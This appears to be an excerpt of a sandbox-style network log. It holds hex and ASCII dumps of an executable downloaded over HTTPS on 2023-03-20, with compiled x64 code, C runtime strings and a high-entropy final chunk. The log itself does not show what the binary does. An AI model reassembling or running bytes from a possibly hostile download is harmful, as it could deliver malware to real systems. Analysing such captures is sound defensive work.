                                                                                                  2023-03-20 12:33:58 UTC80INData Raw: 83 ec 30 83 b9 7c 04 00 00 01 4c 8b d1 75 15 48 83 41 20 08 48 8b 49 20 44 8b 41 f8 4c 89 02 e9 93 00 00 00 48 63 81 ec 0d 00 00 83 f8 63 76 14 e8 d4 9c 01 00 c7 00 16 00 00 00 e8 1d 9b 01 00 32 c0 eb 75 83 b9 78 04 00 00 01 75 59 44 8b 41 3c 48 8d 14 45 91 00 00 00 44 0f b7 49 42 48 03 d0 33 db 48 8d 14 d1 39 1a 75 15 c7 02 01 00 00 00 66 44 89 4a 04 44 89 42 10 b3 01 8a c3 eb 39 44 89 44 24 20 41 b8 01 00 0d 0a 38 30 30 30 0d 0a 00 00 e8 5d 4e 00 00 84 c0 75 e6 e8 70 9c 01 00 c7 00 16 00 00 00 e8 b9 9a 01 00 eb d6 48 8d 0c 40 49 8b 84 ca 90 04 00 00 8b 08 48 89 0a b0 01 48 83 c4 30 5b c3 cc cc 40 53 48 83 ec 30 83 b9 7c 04 00 00 01 4c 8b d1 75 15 48 83 41 20 08 48 8b 49 20 44 8b 41 f8 4c 89 02 e9 93 00 00 00 48 63 81 ec 0d 00 00 83 f8 63 76 14 e8 10 9c
                                                                                                  Data Ascii: 0|LuHA HI DALHccv2uxuYDA<HEDIBH3H9ufDJDB9DD$ A8000]NupH@IHH0[@SH0|LuHA HI DALHccv
                                                                                                  2023-03-20 12:33:58 UTC96INData Raw: 00 00 8b d8 e8 0c 5f 01 00 48 83 a4 24 c0 04 00 00 00 80 7c 24 50 00 74 0c 48 8b 4c 24 38 83 a1 a8 03 00 00 fd 48 8b d7 40 8a ce e8 01 9b 01 00 8b c3 48 8b 8c 24 50 0e 00 00 48 33 cc e8 13 87 fe ff 4c 8d 9c 24 60 0e 00 00 49 8b 5b 18 49 8b 73 20 49 8b e3 5f c3 cc cc 48 8b 09 e9 34 d6 01 00 48 89 5c 24 10 48 89 74 24 18 57 48 81 ec 60 0e 00 00 48 8b 05 0b 46 04 00 48 33 c4 48 89 84 24 50 0e 00 00 48 8b 01 48 8b d9 48 8b 38 48 8b cf e8 cb 99 01 00 48 8b 53 08 48 8d 4c 24 38 40 8a f0 48 8b 12 e8 03 f8 ff ff 48 8b 13 48 8d 44 24 40 48 8b 4b 20 4c 8b 4b 18 4c 8b 02 48 8d 54 24 30 48 8b 09 4d 8b 09 4c 89 44 24 30 4c 8b 43 10 48 89 4c 24 28 48 8d 4c 24 60 48 89 44 24 20 4d 8b 00 e8 ed f4 ff ff 48 8d 4c 24 60 e8 97 28 00 00 48 8b 8c 24 c0 04 00 00 8b d8 e8 14 5e
                                                                                                  Data Ascii: _H$|$PtHL$8H@H$PH3L$`I[Is I_H4H\$Ht$WH`HFH3H$PHHH8HHSHL$8@HHHD$@HK LKLHT$0HMLD$0LCHL$(HL$`HD$ MHL$`(H$^
                                                                                                  2023-03-20 12:33:58 UTC112INData Raw: b7 42 42 c6 42 54 01 48 8b 8a 68 04 00 00 48 8b 41 08 48 39 41 10 75 11 80 79 18 00 74 05 ff 42 28 eb 26 83 4a 28 ff eb 20 ff 42 28 48 ff 41 10 48 8b 82 68 04 00 00 48 8b 08 66 44 89 01 48 8b 82 68 04 00 00 48 83 00 02 b0 01 c3 cc 44 0f b7 49 42 4c 8b c1 c6 41 54 01 48 8b 89 68 04 00 00 48 8b 41 08 48 39 41 10 75 13 80 79 18 00 74 06 41 ff 40 28 eb 28 41 83 48 28 ff eb 21 41 ff 40 28 48 ff 41 10 49 8b 88 68 04 00 00 48 8b 11 66 44 0d 0a 38 30 30 30 0d 0a 89 0a 49 8b 88 68 04 00 00 48 83 01 02 b0 01 c3 40 53 48 83 ec 20 33 d2 48 8b d9 e8 28 04 00 00 84 c0 74 41 48 8b 83 68 04 00 00 8a 53 41 8b 48 14 c1 e9 0c f6 c1 01 74 0e 48 8b 83 68 04 00 00 48 83 78 08 00 74 19 0f be ca 48 8b 93 68 04 00 00 e8 ba 95 01 00 83 f8 ff 75 05 09 43 28 eb 03 ff 43 28 b0 01 48
                                                                                                  Data Ascii: BBBTHhHAH9AuytB(&J( B(HAHhHfDHhHDIBLATHhHAH9AuytA@((AH(!A@(HAIhHfD8000IhH@SH 3H(tAHhSAHtHhHxtHhuC(C(H
                                                                                                  2023-03-20 12:33:58 UTC128INData Raw: b0 01 c3 cc cc 40 53 48 83 ec 20 80 79 41 2a 48 8b d9 74 0e 48 8d 51 34 48 83 c4 20 5b e9 6b 95 ff ff e8 5e 5e 00 00 84 c0 74 24 83 bb 78 04 00 00 01 75 09 83 bb 7c 04 00 00 01 75 10 8b 43 34 85 c0 79 09 83 4b 30 04 f7 d8 89 43 34 b0 01 48 83 c4 20 5b c3 80 79 41 2a 74 09 48 8d 51 34 e9 ad 95 ff ff 48 83 41 20 08 48 8b 41 20 8b 50 f8 89 51 34 85 d2 79 09 83 49 30 04 f7 da 89 51 34 b0 01 c3 cc cc 66 83 79 42 2a 74 09 48 8d 51 34 e9 00 96 ff ff 48 83 41 20 08 48 8b 41 20 8b 50 f8 89 51 34 85 d2 79 09 83 49 30 04 f7 da 89 51 34 b0 01 c3 cc 40 53 48 83 ec 20 66 83 79 42 2a 48 8b d9 74 0e 48 8d 51 34 48 83 c4 20 5b e9 42 96 ff ff e8 c1 5e 00 00 84 c0 74 24 83 bb 78 04 00 00 01 75 09 83 bb 7c 04 00 00 01 75 10 8b 43 34 85 c0 79 09 83 4b 30 04 f7 d8 89 43 34 b0
                                                                                                  Data Ascii: @SH yA*HtHQ4H [k^^t$xu|uC4yK0C4H [yA*tHQ4HA HA PQ4yI0Q4fyB*tHQ4HA HA PQ4yI0Q4@SH fyB*HtHQ4H [B^t$xu|uC4yK0C4
                                                                                                  2023-03-20 12:33:58 UTC144INData Raw: 00 00 eb 11 83 63 30 f7 b8 00 02 00 00 39 43 38 7e 03 89 43 38 48 85 c9 75 04 83 63 30 df 45 8b c2 49 3b d3 75 0d 48 8b d1 48 8b cb e8 e4 2a ff ff eb 0a 8b d1 48 8b cb e8 88 23 ff ff 8b 43 30 c1 e8 07 a8 01 74 1d 83 7b 50 00 74 09 48 8b 4b 48 80 39 30 74 0e 48 ff 4b 48 48 8b 4b 48 c6 01 30 ff 43 50 b0 01 48 83 c4 20 5b c3 cc 48 89 5c 24 10 48 89 6c 24 18 48 89 74 24 20 57 41 54 41 56 48 83 ec 20 8b ea 48 8b d9 8b 49 3c ba 04 00 00 00 41 8a f0 44 8d 62 04 0d 0a 38 30 30 30 0d 0a 44 8d 72 fd 83 f9 05 7f 6b 74 18 85 c9 74 54 41 2b ce 74 5b 41 2b ce 74 4f 41 2b ce 74 45 41 3b ce 75 62 49 8b fc 48 83 64 24 40 00 48 8b c7 49 2b c6 0f 84 b4 00 00 00 49 2b c6 0f 84 8a 00 00 00 48 83 e8 02 74 63 48 3b c2 74 3d e8 2f 9c 00 00 c7 00 16 00 00 00 e8 78 9a 00 00 32 c0
                                                                                                  Data Ascii: c09C8~C8Huc0EI;uHH*H#C0t{PtHKH90tHKHHKH0CPH [H\$Hl$Ht$ WATAVH HI<ADb8000DrkttTA+t[A+tOA+tEA;ubIHd$@HI+I+HtcH;t=/x2
                                                                                                  2023-03-20 12:33:58 UTC160INData Raw: 14 41 c1 ea 0c 41 f6 c2 01 74 12 48 8b 01 48 83 78 08 00 75 08 45 01 01 e9 ac 00 00 00 48 8b 7c 24 60 49 63 c0 8b 2f 83 27 00 4c 8d 3c 42 89 6c 24 40 49 3b d7 0f 84 83 00 00 00 bd ff ff 00 00 48 8b 06 45 0f b7 06 8b 48 14 c1 e9 0c f6 c1 01 74 0a 48 8b 06 48 83 78 08 00 74 16 48 8b 16 41 0f b7 c8 e8 b9 d1 00 00 66 3b c5 75 05 83 0b ff eb 09 ff 03 8b 03 83 f8 ff 75 36 83 3f 2a 75 3a 48 8b 06 8b 48 14 c1 e9 0c f6 c1 01 74 0a 48 8b 06 48 83 78 08 00 74 17 48 8b 16 b9 3f 00 00 00 e8 7c d1 00 00 66 3b c5 75 05 83 0b ff eb 02 ff 03 49 83 c6 02 4d 3b f7 75 86 8b 6c 24 40 83 3f 00 75 06 85 ed 74 02 89 2f 48 8b 5c 24 48 48 8b 6c 24 50 48 8b 74 24 58 48 83 c4 20 41 5f 41 5e 5f c3 cc cc cc 48 8b c4 48 89 58 08 48 89 68 10 48 89 70 18 48 89 78 20 41 54 41 56 41 57 48
                                                                                                  Data Ascii: AAtHHxuEH|$`Ic/'L<Bl$@I;HEHtHHxtHAf;uu6?*u:HHtHHxtH?|f;uIM;ul$@?ut/H\$HHl$PHt$XH A_A^_HHXHhHpHx ATAVAWH
                                                                                                  2023-03-20 12:33:58 UTC176INData Raw: 00 4c 8d 05 6d f7 01 00 48 8d 15 6e f7 01 00 e9 65 04 00 00 cc 4c 8d 0d 79 f7 01 00 b9 04 00 00 00 4c 8d 05 65 f7 01 00 48 8d 15 66 f7 01 00 e9 45 04 00 00 cc 4c 8d 0d 69 f7 01 00 b9 05 00 00 00 4c 8d 05 55 f7 01 00 48 8d 15 56 f7 01 00 e9 25 04 00 00 cc 4c 8d 0d 61 f7 01 00 b9 06 00 00 00 4c 8d 05 4d f7 01 00 48 8d 15 4e f7 01 00 e9 05 04 00 00 cc 4c 8d 0d 59 f7 01 00 b9 07 00 00 00 4c 8d 05 45 f7 01 00 48 8d 15 46 f7 01 00 e9 e5 03 00 00 cc 4c 8d 0d 51 f7 01 00 b9 08 00 00 00 0d 0a 31 30 30 30 30 0d 0a 4c 8d 05 3d f7 01 00 48 8d 15 3e f7 01 00 e9 c5 03 00 00 cc 4c 8d 0d 51 f7 01 00 b9 09 00 00 00 4c 8d 05 3d f7 01 00 48 8d 15 3e f7 01 00 e9 a5 03 00 00 cc 4c 8d 0d 49 f7 01 00 b9 0a 00 00 00 4c 8d 05 35 f7 01 00 48 8d 15 36 f7 01 00 e9 85 03 00 00 cc 4c
                                                                                                  Data Ascii: LmHneLyLeHfELiLUHV%LaLMHNLYLEHFLQ10000L=H>LQL=H>LIL5H6L
                                                                                                  2023-03-20 12:33:58 UTC192INData Raw: c3 cc 48 8b 01 c3 33 c0 c3 cc 33 c0 48 39 01 0f 95 c0 c3 cc cc cc 48 8b c4 48 89 58 08 48 89 68 10 48 89 70 18 48 89 78 20 41 56 48 83 ec 40 ff 15 51 97 01 00 45 33 f6 48 8b d8 48 85 c0 0f 84 a6 00 00 00 48 8b f0 66 44 39 30 74 1c 48 83 c8 ff 48 ff c0 66 44 39 34 46 75 f6 48 8d 34 46 48 83 c6 02 66 44 39 36 75 e4 4c 89 74 24 38 48 2b f3 4c 89 74 24 30 48 83 c6 02 48 d1 fe 4c 8b c3 44 8b ce 44 89 74 24 28 33 d2 4c 89 74 24 20 33 c9 ff 15 6f 98 01 00 48 63 e8 85 c0 74 4c 48 8b cd e8 e0 1a 00 00 48 8b f8 48 85 c0 74 2f 4c 89 74 24 38 44 8b ce 4c 89 74 24 30 4c 8b c3 89 6c 24 28 33 d2 33 c9 48 89 44 24 20 ff 15 35 98 01 00 85 c0 74 08 48 8b f7 49 8b fe eb 03 49 8b f6 48 8b cf e8 46 de ff ff eb 03 49 8b f6 48 85 db 74 09 48 8b cb ff 15 83 96 01 00 48 8b 5c 24
                                                                                                  Data Ascii: H33H9HHXHhHpHx AVH@QE3HHHfD90tHHfD94FuH4FHfD96uLt$8H+Lt$0HHLDDt$(3Lt$ 3oHctLHHHt/Lt$8DLt$0Ll$(33HD$ 5tHIIHFIHtHH\$
                                                                                                  2023-03-20 12:33:58 UTC208INData Raw: 48 2b c8 4c 8d 1c 4a eb 14 66 0f 6f c1 66 0f 75 02 66 0f d7 c0 85 c0 75 09 48 83 c2 10 49 3b d3 75 e7 4b 8d 04 50 eb 0a 66 44 39 0a 74 09 48 83 c2 02 48 3b d0 75 f1 49 2b d0 48 d1 fa 48 8b c2 c3 cc c5 f8 77 c3 c2 00 00 cc 40 55 48 83 ec 20 48 8d 6c 24 20 48 83 e5 e0 c5 fe 6f 01 c5 fd 74 02 48 83 c4 20 5d c3 cc cc cc 40 55 48 83 ec 20 48 8d 6c 24 20 48 83 e5 e0 c5 fe 6f 01 c5 fd 75 02 48 83 c4 20 5d c3 cc cc cc 66 0f 6f 01 66 0f 74 02 c3 cc cc cc 66 0f 6f 01 66 0f 75 02 c3 cc cc cc c5 fe 6f 01 c5 fd d7 c0 c3 cc cc cc 66 0f 6f 01 66 0f d7 c0 c3 cc cc cc 40 55 48 83 ec 20 48 8d 6c 24 20 48 83 e5 e0 c5 fc 57 c0 48 83 c4 20 5d c3 cc cc cc 0f 57 c0 c3 40 55 48 83 ec 20 48 8d 6c 24 20 48 83 e5 e0 8b 05 b7 85 02 00 4c 8b c9 83 f8 05 0f 8c 8c 00 00 00 4c 8b c1 b8
                                                                                                  Data Ascii: H+LJfofufuHI;uKPfD9tHH;uI+HHw@UH Hl$ HotH ]@UH Hl$ HouH ]foftfofuofof@UH Hl$ HWH ]W@UH Hl$ HLL
                                                                                                  2023-03-20 12:33:58 UTC224INData Raw: e8 25 5d ff ff bb 16 00 00 00 89 18 e8 6d 5b ff ff 8b c3 48 8b 5c 24 30 48 83 c4 20 5f c3 4c 2b c1 48 8b d1 4d 8b da 49 8b d9 49 83 f9 ff 75 19 41 0f b7 04 10 66 89 02 48 8d 52 02 66 85 c0 74 2d 49 83 eb 01 75 e9 eb 25 41 0f b7 04 10 66 89 02 48 8d 52 02 66 85 c0 74 0c 49 83 eb 01 74 06 48 83 eb 01 75 e3 48 85 db 75 03 66 89 3a 4d 85 db 0f 85 69 ff ff ff 49 83 f9 ff 75 0c 66 42 89 7c 51 fe 41 8d 43 50 eb 8a 66 89 39 e8 99 5c ff ff bb 22 00 00 00 e9 6f ff ff ff cc cc cc 48 89 5c 24 08 57 48 83 ec 20 45 33 d2 4c 8b da 4d 85 c9 75 2c 48 85 c9 75 2c 48 85 d2 74 14 e8 68 5c ff ff bb 16 00 00 00 89 18 e8 b0 5a ff ff 44 8b d3 41 8b c2 48 8b 5c 24 30 48 83 c4 20 5f c3 48 85 c9 74 d9 48 85 d2 74 d4 4d 85 c9 75 06 66 44 89 11 eb dd 4d 85 c0 75 06 66 44 89 11 eb be
                                                                                                  Data Ascii: %]m[H\$0H _L+HMIIuAfHRft-Iu%AfHRftItHuHuf:MiIufB|QACPf9\"oH\$WH E3LMu,Hu,Hth\ZDAH\$0H _HtHtMufDMufD
                                                                                                  2023-03-20 12:33:58 UTC240INData Raw: 9a 06 02 00 48 33 c4 48 89 85 e0 02 00 00 b8 cd cc cc cc 89 54 24 28 44 8b c2 4c 8d 25 6d 36 fc ff f7 e2 45 33 c9 4c 8b f1 8b c2 c1 e8 03 89 44 24 2c 44 8b f8 89 44 24 20 85 c0 0f 84 46 04 00 00 b8 26 00 00 00 0f 1f 84 00 00 00 00 00 41 83 ff 26 45 8b ef 44 0f 47 e8 33 d2 44 89 6c 24 24 41 8d 45 ff 48 8d 3c 85 f0 12 05 00 42 0f b6 4c 27 02 42 0f b6 74 27 03 48 8d 1c 8d 00 00 00 00 8d 04 0e 4c 8b c3 48 8d 4c 24 44 89 44 24 40 e8 ac 59 fc ff 42 0f b7 04 27 48 8d 4c 24 44 48 c1 e6 02 48 03 cb 4c 8b c6 48 8d 0d 0a 38 30 30 30 0d 0a 14 85 e0 09 05 00 49 03 d4 e8 c6 24 fd ff 8b 4c 24 40 83 f9 01 0f 87 a0 00 00 00 8b 44 24 44 85 c0 75 0a 33 f6 41 89 36 e9 87 03 00 00 83 f8 01 0f 84 7e 03 00 00 45 8b 16 45 85 d2 0f 84 72 03 00 00 33 f6 4d 8d 5e 04 44 8b c6 44 8b
                                                                                                  Data Ascii: H3HT$(DL%m6E3LD$,DD$ F&A&EDG3Dl$$AEH<BL'Bt'HLHL$DD$@YB'HL$DHHLH8000I$L$@D$Du3A6~EEr3M^DD
                                                                                                  2023-03-20 12:33:58 UTC256INData Raw: fe ff cc cc cc cc 48 89 5c 24 10 48 89 6c 24 18 48 89 74 24 20 57 48 81 ec 20 01 00 00 48 8b 05 82 c6 01 00 48 33 c4 48 89 84 24 10 01 00 00 48 8b d9 e8 9b ba fe ff 48 8b e8 e8 93 ba fe ff 48 8b cb 48 8b b8 a0 03 00 00 e8 f8 05 00 00 8b 8d b4 00 00 00 4c 8d 44 24 20 f7 d9 41 b9 78 00 00 00 8b c8 8b f0 1b d2 81 e2 05 f0 ff ff 81 c2 02 10 00 00 ff 15 c5 98 00 00 33 db 85 c0 75 07 89 1f 8d 43 01 eb 43 48 8b 8d a0 00 00 00 48 8d 54 24 20 e8 b7 37 00 00 85 c0 75 24 48 8d 0d 74 19 01 00 66 3b 31 74 18 ff c3 48 83 c1 02 48 63 c3 48 83 f8 0a 72 ec 83 0f 04 89 77 08 89 77 04 8b 07 c1 e8 02 f7 d0 83 e0 01 48 8b 8c 24 10 01 00 00 48 33 cc e8 9d 06 fc ff 4c 8d 9c 24 20 01 00 00 49 8b 5b 18 49 8b 6b 20 49 8b 73 28 49 8b e3 5f c3 48 89 5c 24 08 57 48 83 ec 20 48 8b d9
                                                                                                  Data Ascii: H\$Hl$Ht$ WH HH3H$HHHHLD$ Ax3uCCHHT$ 7u$Htf;1tHHcHrwwH$H3L$ I[Ik Is(I_H\$WH H
                                                                                                  2023-03-20 12:33:58 UTC272INData Raw: 89 7c 24 28 4c 8d 4c 24 30 4c 8d 05 92 fe ff ff 89 7c 24 20 33 d2 4c 89 74 24 30 33 c9 48 89 5c 24 38 89 74 24 40 89 7c 24 44 ff 15 2e 57 00 00 48 8b d8 48 83 f8 ff 74 4d 45 33 c0 83 ca ff 48 8b c8 ff 15 0e 57 00 00 48 8b cb 85 c0 74 08 ff 15 f9 56 00 00 eb 2f 8b 7c 24 44 eb f2 e8 64 96 fe ff 84 c0 75 08 0f ba ee 15 33 c9 eb 08 e8 8b 95 fe ff 48 8b c8 44 8b ce 4d 8b c6 48 8b d3 e8 6e 92 fe ff 8b f8 48 8b 5c 24 60 8b c7 48 8b 7c 24 78 48 8b 6c 24 68 48 8b 74 24 70 48 83 c4 50 41 5e c3 cc cc cc 48 8b c4 48 89 58 08 48 89 68 10 48 0d 0a 31 30 30 30 30 0d 0a 89 70 18 48 89 78 20 41 56 48 83 ec 50 41 8b f0 4c 8b f2 48 8b d9 e8 cd 96 fe ff 40 8a e8 ff 15 40 57 00 00 33 ff 85 c0 74 1d 48 85 db 74 09 48 8b cb ff 15 1c 56 00 00 40 84 ed 74 0a bf 04 00 00 00 e9 a9
                                                                                                  Data Ascii: |$(LL$0L|$ 3Lt$03H\$8t$@|$D.WHHtME3HWHtV/|$Ddu3HDMHnH\$`H|$xHl$hHt$pHPA^HHXHhH10000pHx AVHPALH@@W3tHtHV@t
                                                                                                  2023-03-20 12:33:58 UTC288INData Raw: e8 da e7 ff ff 48 8d 54 24 40 48 8b cb ff 15 8c 19 00 00 33 c0 e9 ba 00 00 00 0f 28 05 7e b9 00 00 41 0f b7 c9 d1 e9 49 c1 e9 10 41 0f b7 c1 d1 e8 89 05 9c 6d 01 00 89 05 9e 6d 01 00 33 c0 89 05 ae 6d 01 00 89 0d 84 6d 01 00 89 0d 86 6d 01 00 0f 29 05 87 6d 01 00 c6 05 90 6d 01 00 00 eb 73 33 c9 ff 15 4e 19 00 00 33 c0 eb 67 66 41 83 f8 69 74 0d ba 11 01 00 00 ff 15 70 19 00 00 eb 53 ff 15 70 19 00 00 33 c0 eb 49 8b c2 2d 19 01 00 00 74 31 83 f8 01 75 e0 33 c0 48 c7 44 24 34 01 00 00 00 4c 8d 4c 24 30 89 44 24 30 33 d2 c7 44 24 20 0c 00 00 00 44 8d 40 01 ff 15 16 19 00 00 33 c0 eb 0f 48 8b d3 48 8d 0d 48 4f 01 00 e8 4b fa ff ff 48 8b 8c 24 90 00 00 00 48 33 cc e8 9b 86 fb ff 48 81 c4 a0 00 00 00 5b c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc
                                                                                                  Data Ascii: HT$@H3(~AIAmm3mmm)mms3N3gfAitpSp3I-t1u3HD$4LL$0D$03D$ D@3HHHOKH$H3H[
                                                                                                  2023-03-20 12:33:58 UTC304INData Raw: 65 62 00 4d 61 72 00 41 70 72 00 4d 61 79 00 4a 75 6e 00 4a 75 6c 00 41 75 67 00 53 65 70 00 4f 63 74 00 4e 6f 76 00 44 65 63 00 00 00 00 00 4a 61 6e 75 61 72 79 00 46 65 62 72 75 61 72 79 00 00 00 00 4d 61 72 63 68 00 00 00 41 70 72 69 6c 00 00 00 4a 75 6e 65 00 00 00 00 4a 75 6c 79 00 00 00 00 41 75 67 75 73 74 00 00 00 00 00 00 53 65 70 74 65 6d 62 65 72 00 00 00 00 00 00 00 4f 63 74 6f 62 65 72 00 4e 6f 76 65 6d 62 65 72 00 00 00 00 00 00 00 00 44 65 63 65 6d 62 65 72 00 00 00 00 41 4d 00 00 50 4d 00 00 00 00 00 00 4d 4d 2f 64 64 2f 79 79 00 00 00 00 00 00 00 00 64 64 64 64 2c 20 4d 4d 4d 4d 20 64 64 2c 20 79 79 79 79 00 00 00 00 00 48 48 3a 6d 6d 3a 73 73 00 00 00 00 00 00 00 00 53 00 75 00 6e 00 00 00 4d 00 6f 00 6e 00 00 00 54 00 75 00 65 00 00 00
                                                                                                  Data Ascii: ebMarAprMayJunJulAugSepOctNovDecJanuaryFebruaryMarchAprilJuneJulyAugustSeptemberOctoberNovemberDecemberAMPMMM/dd/yydddd, MMMM dd, yyyyHH:mm:ssSunMonTue
                                                                                                  2023-03-20 12:33:58 UTC320INData Raw: 00 73 00 00 00 00 00 7a 00 68 00 2d 00 63 00 68 00 74 00 00 00 00 00 7a 00 68 00 2d 00 63 00 6e 00 00 00 00 00 00 00 7a 00 68 00 2d 00 68 00 6b 00 00 00 00 00 00 00 7a 00 68 00 2d 00 6d 00 6f 00 00 00 00 00 00 00 7a 00 68 00 2d 00 73 00 67 00 00 00 00 00 00 00 7a 00 68 00 2d 00 74 00 77 00 00 00 00 00 00 00 7a 00 75 00 2d 00 7a 00 61 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e4 0b 54 02 00 00 00 00 00 10 63 2d 5e c7 6b 05 00 00 00 00 00 00 40 ea ed 74 46 d0 9c 2c 9f 0c 00 00 00 00 61 f5 b9 ab bf a4 5c c3 f1 29 63 1d 00 00 00 00 00 64 b5 fd 34 05 c4 d2 87 66 92 f9 15 3b 6c 44 00 00 00 00 00 00 10 d9 90 65 94 2c 42 62 d7 01 45 22 9a 17 26 27 4f 9f 00 00 00 40 02 95 07 c1 89 56 24 1c a7 fa c5 67 6d c8 73 dc 6d ad eb 72 01 00 00 00 00 c1 ce 64 27 a2 63
                                                                                                  Data Ascii: szh-chtzh-cnzh-hkzh-mozh-sgzh-twzu-zaTc-^k@tF,a\)cd4f;lDe,BbE"&'O@V$gmsmrd'c
                                                                                                  2023-03-20 12:33:58 UTC336INData Raw: 49 05 00 50 49 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 00 00 00 10 49 05 00 00 00 00 00 47 43 54 4c 00 10 00 00 20 00 00 00 2e 74 65 78 74 24 64 69 00 00 00 00 20 10 00 00 b0 85 04 00 2e 74 65 78 74 24 6d 6e 00 00 00 00 d0 95 04 00 12 00 00 00 2e 74 65 78 74 24 6d 6e 24 30 30 00 e2 95 04 00 2e 09 00 00 2e 74 65 78 74 24 78 00 10 9f 04 00 1f 00 00 00 2e 74 65 78 74 24 79 64 00 00 00 00 00 a0 04 00 30 04 00 00 2e 69 64 61 74 61 24 35 00 00 00 00 30 a4 04 00 10 00 00 00 2e 30 30 63 66 67 00 00 40 a4 04 00 08 00 00 00 0d 0a 31 30 30 30 30 0d 0a 2e 43 52 54 24 58 43 41 00 00 00 00 48 a4 04 00 10 00 00 00 2e 43 52 54 24 58 43 55 00 00 00 00 58 a4 04 00 08 00 00 00 2e 43 52 54 24 58 43 5a 00 00 00 00 60 a4 04 00 08 00 00
                                                                                                  Data Ascii: IPIIGCTL .text$di .text$mn.text$mn$00..text$x.text$yd0.idata$50.00cfg@10000.CRT$XCAH.CRT$XCUX.CRT$XCZ`
                                                                                                  2023-03-20 12:33:58 UTC352INData Raw: 14 54 07 00 14 34 06 00 14 32 10 70 01 0a 02 00 0a 32 06 30 11 0a 04 00 0a 34 06 00 0a 32 06 70 9a 23 00 00 01 00 00 00 9b 81 03 00 b1 81 03 00 03 9d 04 00 00 00 00 00 01 06 02 00 06 32 02 50 01 0a 04 00 0a 34 06 00 0a 32 06 70 01 04 01 00 04 42 00 00 01 14 08 00 14 64 0a 00 14 54 09 00 14 34 08 00 14 52 10 70 01 15 09 00 15 74 05 00 15 64 04 00 15 54 03 00 15 34 02 00 15 e0 00 00 01 04 01 00 04 42 00 00 19 1f 05 00 0d 01 88 00 06 e0 04 c0 02 50 00 00 e8 6d 04 00 00 04 00 00 21 28 0a 00 28 f4 83 00 20 d4 84 00 18 74 85 00 10 64 86 00 08 34 87 00 00 86 03 00 5b 86 03 00 e0 89 05 00 21 00 00 00 00 86 03 00 5b 86 03 00 e0 89 05 00 01 17 06 00 17 54 0b 00 17 32 13 f0 11 e0 0f 70 21 15 06 00 15 c4 0a 00 0d 64 09 00 05 34 08 00 00 85 03 00 17 85 03 00 2c 8a 05
                                                                                                  Data Ascii: T42p2042p#2P42pBdT4RptdT4BPm!(( td4[![T2p!d4,
                                                                                                  2023-03-20 12:33:58 UTC368INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 61 62 63 64 65 66 67 68 69 6a 6b 6c 6d 6e 6f 70 71 72 73 74 75 76 77 78 79 7a 00 00 00 00 00 00 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f 50 51 52 53 54 55 56 57 58 59 5a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                  Data Ascii: abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ
                                                                                                  2023-03-20 12:33:58 UTC384INData Raw: fc c3 03 00 2e c4 03 00 cc 8f 05 00 60 c4 03 00 c7 c4 03 00 00 8e 05 00 d0 c4 03 00 b3 c5 03 00 e4 8e 05 00 b3 c5 03 00 96 c6 03 00 fc 8e 05 00 96 c6 03 00 12 c8 03 00 10 8f 05 00 12 c8 03 00 1a c8 03 00 30 8f 05 00 1a c8 03 00 35 c8 03 00 40 8f 05 00 35 c8 03 00 3c c8 03 00 50 8f 05 00 40 c8 03 00 7e c8 03 00 7c 8e 05 00 7e c8 03 00 9e c8 03 00 84 8e 05 00 9e c8 03 00 f2 c8 03 00 98 8e 05 00 f2 c8 03 00 1c c9 03 00 b4 8e 05 00 1c c9 03 00 3d c9 03 00 cc 8e 05 00 50 c9 03 00 06 cf 03 00 74 8f 05 00 10 cf 03 00 59 cf 03 00 74 8e 05 00 60 cf 03 00 f3 cf 03 00 14 8e 05 00 f3 cf 03 00 0c d0 03 00 2c 8e 05 00 0c d0 03 00 6e d0 03 00 40 8e 05 00 6e d0 03 00 a4 d0 03 00 54 8e 05 00 a4 d0 03 00 dd d0 03 00 64 8e 05 00 e0 d0 03 00 4b e4 03 00 d0 8d 05 00 4c e4 03
                                                                                                  Data Ascii: .`05@5<P@~|~=PtYt`,n@nTdKL
                                                                                                  2023-03-20 12:33:58 UTC400INData Raw: 34 3d c2 bc be 86 6c 01 6d ce 0a af 54 23 bf 01 31 44 2b 93 7a dd d8 e9 52 6f f8 12 d0 6b a0 5c c4 dc da 36 56 b2 34 bb 91 e6 31 2a 85 4e ed b4 53 ff 27 d5 4a d1 d2 35 58 af b8 02 dc 35 d1 9f b7 b2 0c cc d0 e3 71 00 ac 14 8e 2f d5 66 e9 ba 96 bb d4 95 52 d5 67 ed 27 d0 00 d8 63 6c e6 6c 34 1f 01 73 56 1e 34 47 3a f8 74 6d 3f 66 11 01 bf 01 6c d5 4a 2d 54 92 09 6d b8 32 20 d3 01 29 73 f4 3c 34 77 23 04 09 e6 34 76 6e df 66 e9 fe 63 ff 67 df 72 a5 fc 21 e5 e6 7d 53 47 84 53 71 72 75 f7 a7 e6 75 71 e9 16 8c ce d5 93 66 ed ec 2b 44 2b 11 b4 a5 3a e7 96 04 7c cc 71 e5 64 92 18 30 f2 5d 0d 0a 31 30 30 30 30 0d 0a df 30 ca c1 00 ca 34 ab 21 98 50 dd 35 44 ec 11 88 64 94 6c 52 ae 5c c0 64 ed 54 9e 7d 02 47 73 91 30 36 cd ed 71 31 ab 21 64 5e 28 32 68 40 11 78 73
                                                                                                  Data Ascii: 4=lmT#1D+zRok\6V41*NS'J5X5q/fRg'cll4sV4G:tm?flJ-Tm2 )s<4w#4vnfcgr!}SGSqruuqf+D+:|qd0]1000004!P5DdlR\dT}Gs06q1!d^(2h@xs
